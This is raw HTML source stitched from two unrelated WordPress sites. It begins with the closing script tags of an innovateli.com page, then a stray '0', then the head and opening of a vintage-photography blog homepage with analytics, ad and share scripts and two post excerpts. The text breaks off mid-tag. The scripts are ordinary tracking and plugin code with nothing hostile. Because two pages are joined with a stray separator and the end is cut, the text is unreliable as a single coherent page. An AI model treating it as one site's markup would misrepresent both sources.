{"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1'></script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=4.9.10'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=4.9.10'></script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-includes/js/mediaelement/renderers/vimeo.min.js?ver=4.2.6-78496d1'></script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-content/plugins/logo-slider/includes/js/lsp_jquery.cycle2.js?ver=2.1.2'></script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-content/plugins/logo-slider/includes/js/lsp_jquery.cycle2.carousel.min.js?ver=1'></script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-content/plugins/logo-slider/includes/js/lsp_jquery_shuffle.js?ver=1'></script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-content/plugins/logo-slider/includes/js/lsp_jquery.easing.js?ver=1'></script> <script type='text/javascript' src='http://www.innovateli.com/wp/wp-content/plugins/logo-slider/includes/js/lsp_jquery_tile.js?ver=1'></script> </body> </html>
0
<!DOCTYPE html> <html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta name="google-site-verification" content="VyLQFp1yuQE1qGtM14zf-ft1iQHZol2s6c2BaiwGFd0" /> <meta name="msvalidate.01" content="431D11313D17178DF44F2D0CF7A2AF20" /> <meta name="p:domain_verify" content="31f67c15e8b3f3dbc9373f68258a9994"/> <meta name="p:domain_verify" content="76cdb51da11774943135429d4350caaf"/> <meta name="majestic-site-verification" content="MJ12_1c98fd54-3f79-4c5a-b2eb-91336d464ab9"> <meta name="google-site-verification" content="JDqXKbm7j2Di2bel7_qrTenRU87j03gAkgV-lrr0pN0" /> <meta charset="UTF-8"> <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame --> <!--[if IE ]> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <![endif]--> <link rel="profile" href="http://gmpg.org/xfn/11" /> <title>Old Pics Archives - Historical and Vintage Photography</title> <!--iOS/android/handheld specific --> <link rel="apple-touch-icon" href="http://oldpicsarchive.online/wp-content/themes/pinstagram/apple-touch-icon.png" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-status-bar-style" content="black"> <link rel="pingback" href="http://oldpicsarchive.online/xmlrpc.php" /> <script type="text/javascript">function heateorSssLoadEvent(e) {var t=window.onload;if (typeof window.onload!="function") {window.onload=e}else{window.onload=function() {t();e()}}}; var heateorSssSharingAjaxUrl = 'http://oldpicsarchive.online/wp-admin/admin-ajax.php', heateorSssCloseIconPath = 'http://oldpicsarchive.online/wp-content/plugins/sassy-social-share/public/../images/close.png', heateorSssPluginIconPath = 'http://oldpicsarchive.online/wp-content/plugins/sassy-social-share/public/../images/logo.png', heateorSssHorizontalSharingCountEnable = 0, heateorSssVerticalSharingCountEnable = 0, heateorSssSharingOffset = -10; var heateorSssMobileStickySharingEnabled = 1;var heateorSssCopyLinkMessage = "Link copied.";var heateorSssUrlCountFetched = [], heateorSssSharesText = 'Shares', heateorSssShareText = 'Share';function heateorSssPopup(e) {window.open(e,"popUpWindow","height=400,width=600,left=400,top=100,resizable,scrollbars,toolbar=0,personalbar=0,menubar=no,location=no,directories=no,status")}function heateorSssInitiateFB() {FB.init({appId:"",channelUrl:"",status:!0,cookie:!0,xfbml:!0,version:"v2.11"})}window.fbAsyncInit=function() {heateorSssInitiateFB(),0&&(FB.Event.subscribe("edge.create",function(e) {heateorSsmiMycredPoints("Facebook_like_recommend","",e?e:"")}),FB.Event.subscribe("edge.remove",function(e) {heateorSsmiMycredPoints("Facebook_like_recommend","",e?e:"","Minus point(s) for undoing Facebook like-recommend")}) ),0&&(FB.Event.subscribe("edge.create",function(e) {heateorSsgaSocialPluginsTracking("Facebook","Like",e?e:"")}),FB.Event.subscribe("edge.remove",function(e) {heateorSsgaSocialPluginsTracking("Facebook","Unlike",e?e:"")}) )},function(e) {var n,i="facebook-jssdk",o=e.getElementsByTagName("script")[0];e.getElementById(i)||(n=e.createElement("script"),n.id=i,n.async=!0,n.src="//connect.facebook.net/en_US/sdk.js",o.parentNode.insertBefore(n,o) )}(document);;var heateorSssWhatsappShareAPI = "web";</script><style type="text/css"> .heateor_sss_horizontal_sharing .heateorSssSharing{ color: #fff; border-width: 0px; border-style: solid; border-color: transparent; } .heateor_sss_horizontal_sharing .heateorSssTCBackground{ color:#666; } .heateor_sss_horizontal_sharing .heateorSssSharing:hover{ border-color: transparent; } .heateor_sss_vertical_sharing .heateorSssSharing{ color: #fff; border-width: 0px; border-style: solid; border-color: transparent; } .heateor_sss_vertical_sharing .heateorSssTCBackground{ color:#666; } .heateor_sss_vertical_sharing .heateorSssSharing:hover{ border-color: transparent; } @media screen and (max-width:783px) {.heateor_sss_vertical_sharing{display:none!important}}div.heateor_sss_mobile_footer{display:none;}@media screen and (max-width:783px){i.heateorSssTCBackground{background-color:white!important}div.heateor_sss_bottom_sharing{width:100%!important;left:0!important;}div.heateor_sss_bottom_sharing li{width:10% !important;}div.heateor_sss_bottom_sharing .heateorSssSharing{width: 100% !important;}div.heateor_sss_bottom_sharing div.heateorSssTotalShareCount{font-size:1em!important;line-height:28px!important}div.heateor_sss_bottom_sharing div.heateorSssTotalShareText{font-size:.7em!important;line-height:0px!important}div.heateor_sss_mobile_footer{display:block;height:40px;}.heateor_sss_bottom_sharing{padding:0!important;display:block!important;width: auto!important;bottom:-2px!important;top: auto!important;}.heateor_sss_bottom_sharing .heateor_sss_square_count{line-height: inherit;}.heateor_sss_bottom_sharing .heateorSssSharingArrow{display:none;}.heateor_sss_bottom_sharing .heateorSssTCBackground{margin-right: 1.1em !important}}</style> <!-- This site is optimized with the Yoast SEO plugin v11.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Historical and Vintage Photography"/> <link rel="canonical" href="http://oldpicsarchive.online/" /> <link rel="next" href="http://oldpicsarchive.online/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Old Pics Archives - Historical and Vintage Photography" /> <meta property="og:description" content="Historical and Vintage Photography" /> <meta property="og:url" content="http://oldpicsarchive.online/" /> <meta property="og:site_name" content="Old Pics Archives" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Historical and Vintage Photography" /> <meta name="twitter:title" content="Old Pics Archives - Historical and Vintage Photography" /> <meta name="google-site-verification" content="JDqXKbm7j2Di2bel7_qrTenRU87j03gAkgV-lrr0pN0" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"http://oldpicsarchive.online/#organization","name":"","url":"http://oldpicsarchive.online/","sameAs":[]},{"@type":"WebSite","@id":"http://oldpicsarchive.online/#website","url":"http://oldpicsarchive.online/","name":"Old Pics Archives","publisher":{"@id":"http://oldpicsarchive.online/#organization"},"potentialAction":{"@type":"SearchAction","target":"http://oldpicsarchive.online/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"http://oldpicsarchive.online/#webpage","url":"http://oldpicsarchive.online/","inLanguage":"en-US","name":"Old Pics Archives - Historical and Vintage Photography","isPartOf":{"@id":"http://oldpicsarchive.online/#website"},"about":{"@id":"http://oldpicsarchive.online/#organization"},"description":"Historical and Vintage Photography"}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//platform-api.sharethis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Old Pics Archives &raquo; Feed" href="http://oldpicsarchive.online/feed/" /> <link rel="alternate" type="application/rss+xml" title="Old Pics Archives &raquo; Comments Feed" href="http://oldpicsarchive.online/comments/feed/" /> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.6.0 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.6.0'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-110057562-2'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-110057562-2', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('set', 'anonymizeIp', true); __gaTracker('require', 'displayfeatures'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/oldpicsarchive.online\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/5.2/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='http://oldpicsarchive.online/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='heateor_sss_frontend_css-css' href='http://oldpicsarchive.online/wp-content/plugins/sassy-social-share/public/css/sassy-social-share-public.css?ver=3.2.22' type='text/css' media='all' /> <link rel='stylesheet' id='heateor_sss_sharing_default_svg-css' href='http://oldpicsarchive.online/wp-content/plugins/sassy-social-share/admin/css/sassy-social-share-svg.css?ver=3.2.22' type='text/css' media='all' /> <link rel='stylesheet' id='old-fontawesome-css' href='http://oldpicsarchive.online/wp-content/themes/pinstagram/css/font-awesome.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='stylesheet-css' href='http://oldpicsarchive.online/wp-content/themes/pinstagram/style.css?ver=5.2' type='text/css' media='all' /> <style id='stylesheet-inline-css' type='text/css'> .main-container-wrap {background-color:#eeeeee; } .main-container-wrap {background-image: url(http://oldpicsarchive.online/wp-content/themes/pinstagram/images/pattern34.png);} .postauthor h5, .textwidget a, .pnavigation2 a, .sidebar.c-4-12 a:hover, .copyrights a:hover, footer .widget li a:hover, .sidebar.c-4-12 a:hover, .related-posts a:hover, .reply a, .title a:hover, .comm, #tabber .inside li a:hover, .fn a, a, a:hover { color:#00A8FF; } #navigation ul ul, .head-social ul ul, #navigation ul ul li, .main-header, #commentform input#submit, .contactform #submit, .mts-subscribe input[type='submit'], #move-to-top:hover, #searchform .icon-search, #navigation ul li:hover, .currenttext, .pagination a:hover, .single .pagination a:hover .currenttext, #tabber ul.tabs li a.selected, .readMore a, .tagcloud a, #searchsubmit, #move-to-top, .sbutton, #searchsubmit, .pagination .nav-previous a, .pagination .nav-next a { background-color:#00A8FF; color: #fff!important; } .flex-control-thumbs .flex-active{ border-top:3px solid #00A8FF;} .currenttext, .pagination a:hover, .single .pagination a:hover .currenttext, .sbutton, #searchsubmit, .pagination .nav-previous a, .pagination .nav-next a { border-color: #00A8FF; } .single_post { width: 77%; float: right; } .related-posts2 { float: left; } </style> <link rel='stylesheet' id='responsive-css' href='http://oldpicsarchive.online/wp-content/themes/pinstagram/css/responsive.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/7.2.1/css/jetpack.css' type='text/css' media='all' /> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[{\"path\":\"\\\/go\\\/\",\"label\":\"affiliate\"},{\"path\":\"\\\/recommend\\\/\",\"label\":\"affiliate\"}]","home_url":"http:\/\/oldpicsarchive.online","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='http://oldpicsarchive.online/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.6.0'></script> <script type='text/javascript' src='http://oldpicsarchive.online/wp-content/themes/pinstagram/js/customscript.js?ver=5.2'></script> <script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#product=ga&#038;property=5cb5fe5d384f190012d555f0'></script> <link rel='https://api.w.org/' href='http://oldpicsarchive.online/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://oldpicsarchive.online/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://oldpicsarchive.online/wp-includes/wlwmanifest.xml" /> <!--Theme by MyThemeShop.com--> <link rel='shortlink' href='https://wp.me/aXdfR' /> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <link rel='dns-prefetch' href='//c0.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style><link href="http://fonts.googleapis.com/css?family=Oleo+Script:normal|Source+Sans+Pro:700" rel="stylesheet" type="text/css"> <style type="text/css"> .menu li a{ font-family: "Oleo Script";font-weight: normal;font-size: 13px;color: #ffffff; } h1{ font-family: "Oleo Script";font-weight: normal;font-size: 28px;color: #444444; } h2{ font-family: "Oleo Script";font-weight: normal;font-size: 24px;color: #444444; } h3{ font-family: "Oleo Script";font-weight: normal;font-size: 22px;color: #444444; } h4{ font-family: "Source Sans Pro";font-weight: 700;font-size: 20px;color: #444444; } h5{ font-family: "Source Sans Pro";font-weight: 700;font-size: 18px;color: #444444; } h6{ font-family: "Source Sans Pro";font-weight: 700;font-size: 16px;color: #444444; } body{ font-family: "Oleo Script";font-weight: normal;font-size: 15px;color: #666666; } </style> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-110057562-2"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-110057562-2'); </script> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-9853500171810315", enable_page_level_ads: true }); </script><link rel="me" href="https://twitter.com/MurpleOl" /><meta name="twitter:widgets:link-color" content="#000000" /><meta name="twitter:widgets:border-color" content="#000000" /><meta name="twitter:partner" content="tfwp" /> <meta name="twitter:card" content="summary" /><meta name="twitter:title" content="Old Pics Archives" /><meta name="twitter:site" content="@MurpleOl" /><meta name="twitter:description" content="Historical and Vintage Photography" /> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-TX624T7');</script> <!-- End Google Tag Manager --> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-9853500171810315", enable_page_level_ads: true }); </script> </head> <body id ="blog" class="home blog main" itemscope itemtype="http://schema.org/WebPage"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TX624T7" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <div class="main-container-wrap"> <a href="#" id="pull">Menu</a> <div class="clear" id="catcher"></div> <header id="sticky" class="main-header"> <div class="container"> <div id="header"> <div class="logo-wrap"> <h1 id="logo" class="image-logo"> <a href="http://oldpicsarchive.online"><img src="http://oldpicsarchive.online/wp-content/uploads/2019/02/New-Photo-Logo2.png" alt="Old Pics Archives"></a> </h1><!-- END #logo --> </div> <div class="head-social"> <ul> </ul> </div> <div class="secondary-navigation"> <nav id="navigation" class="clearfix"> <ul id="menu-menu-hiji" class="menu clearfix"><li id="menu-item-9" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-9"><a href="http://oldpicsarchive.online" aria-current="page">Home</a></li> <li id="menu-item-16228" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16228"><a href="http://oldpicsarchive.online/category/art/">Art</a></li> <li id="menu-item-16229" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16229"><a href="http://oldpicsarchive.online/category/artefacts/">Artefacts</a></li> <li id="menu-item-16230" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16230"><a href="http://oldpicsarchive.online/category/cities/">Cities</a></li> <li id="menu-item-16231" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16231"><a href="http://oldpicsarchive.online/category/misc/">History</a></li> <li id="menu-item-16232" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16232"><a href="http://oldpicsarchive.online/category/people/">People</a></li> <li id="menu-item-16233" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16233"><a href="http://oldpicsarchive.online/category/photographers/">Photographers</a></li> <li id="menu-item-16234" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-16234"><a href="http://oldpicsarchive.online/category/travel/">Travel</a></li> <li id="menu-item-13" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-13"><a href="http://oldpicsarchive.online/vintage-video/">Vintage Photography</a></li> <li id="menu-item-38" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38"><a href="http://oldpicsarchive.online/contact-us/">contact us</a></li> <li id="menu-item-39" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39"><a href="http://oldpicsarchive.online/disclaimer/">Disclaimer</a></li> </ul> </nav> </div> </div><!--#header--> </div><!--.container--> </header> <div class="main-container"><div id="page"> <div class="article"> <div id="content_box"> <div class="post-content-in"> <article class="latestPost excerpt "> <a href="http://oldpicsarchive.online/2019/05/14/bandits-roost-campground-59%c2%bd-mulberry-street/" title="bandits roost campground, 59½ Mulberry Street" id="featured-thumbnail"> <div class="featured-thumbnail"><img width="510" height="300" src="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?resize=510%2C300" class="attachment-slider size-slider wp-post-image" alt="" title="" data-attachment-id="16439" data-permalink="http://oldpicsarchive.online/2019/05/14/bandits-roost-campground-59%c2%bd-mulberry-street/three-children-sleeping-in-a-dirty-alley/" data-orig-file="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?fit=614%2C480" data-orig-size="614,480" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;\u00a9 Bettmann\/CORBIS&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;ca. 1890s, Lower East Side, Manhattan, New York, New York, USA --- Three Children Sleeping in a Dirty Alley --- Image by \u00a9 Bettmann\/CORBIS&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;\u00a9 Corbis. All Rights Reserved.&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;Three Children Sleeping in a Dirty Alley&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Three Children Sleeping in a Dirty Alley" data-image-description="" data-medium-file="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?fit=300%2C235" data-large-file="https://i1.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/be036581.jpg?fit=614%2C480" /></div> </a> <div class="post-content-inner"> <header> <h2 class="title front-view-title"><a href="http://oldpicsarchive.online/2019/05/14/bandits-roost-campground-59%c2%bd-mulberry-street/" title="bandits roost campground, 59½ Mulberry Street">bandits roost campground, 59½ Mulberry Street</a></h2> <div class="post-info"> <span class="theauthor"><i class="icon-user"></i> <a href="http://oldpicsarchive.online/author/amang86/" title="Posts by amang86" rel="author">amang86</a></span> </div> </header> <div class="front-view-content"> The end of the 19th century in the city of New York was a magnet for the immigrants of the world, and most of them found roads not bordered by gold but of almost inhuman poverty. While educated people turn a blind eye, brave </div> <div class="readMore"><a href="http://oldpicsarchive.online/2019/05/14/bandits-roost-campground-59%c2%bd-mulberry-street/" title="bandits roost campground, 59½ Mulberry Street" >Read More</a></div> </div><!--End post-content-inner--> </article><!--.post excerpt--> <article class="latestPost excerpt "> <a href="http://oldpicsarchive.online/2019/05/11/arthur-millers-marilyn-monroe/" title="Arthur Miller&#8217;s &#038; Marilyn Monroe" id="featured-thumbnail"> <div class="featured-thumbnail"><img width="510" height="300" src="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/108462044_o-e1557596598579.jpg?resize=350%2C226" class="attachment-slider size-slider wp-post-image" alt="" title="" srcset="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/108462044_o-e1557596598579.jpg?zoom=2&amp;resize=510%2C300 1020w, https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/108462044_o-e1557596598579.jpg?zoom=3&amp;resize=510%2C300 1530w" sizes="(max-width: 510px) 100vw, 510px" data-attachment-id="16430" data-permalink="http://oldpicsarchive.online/2019/05/11/arthur-millers-marilyn-monroe/108462044_o/" data-orig-file="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/108462044_o-e1557596598579.jpg?fit=350%2C226" data-orig-size="350,226" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="108462044_o" data-image-description="" data-medium-file="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/108462044_o-e1557596598579.jpg?fit=300%2C194" data-large-file="https://i2.wp.com/oldpicsarchive.online/wp-content/uploads/2019/05/108462044_o-e1557596598579.jpg?fit=350%2C226" /></div> </a> <div class="post-content-inner"> <header> <h2 class="title front-view-title"><a href="http://oldpicsarchive.online/2019/05/11/arthur-millers-marilyn-monroe/" title="Arthur Miller&#8217;s &#038; Marilyn Monroe">Arthur Miller&#8217;s &#038; Marilyn Monroe</a></h2> <div class="post-info"> <span class="theauthor"><i class="icon-user"></i> <a href="http://oldpicsarchive.online/author/amang86/" title="Posts by amang86" 